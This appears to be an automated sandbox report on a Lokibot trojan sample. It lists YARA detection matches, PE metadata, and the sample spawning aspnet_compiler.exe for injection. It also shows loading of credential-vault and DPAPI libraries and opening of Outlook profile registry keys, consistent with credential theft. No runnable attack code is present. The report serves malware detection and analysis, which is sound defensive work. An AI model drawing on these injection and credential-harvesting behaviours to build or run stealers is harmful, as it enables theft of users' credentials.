Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: 1e#U0414.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

2_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\1e#U0414.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1e#U0414.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\1e#U0414.exe	Mutant created: NULL

Source: 1e#U0414.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1e#U0414.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\1e#U0414.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1e#U0414.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\1e#U0414.exe "C:\Users\user\Desktop\1e#U0414.exe"
Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: 1e#U0414.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1e#U0414.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 1e#U0414.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BATMAN.pdbxD source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Sept24.pdbBSJB source: 1e#U0414.exe
Source:	Binary string: Sept24.pdb source: 1e#U0414.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002754602.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BATMAN.pdb source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: 1e#U0414.exe

Static PE information: section name: .text entropy: 7.531903789782718

Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe	Memory allocated: 1860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory allocated: 3400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior

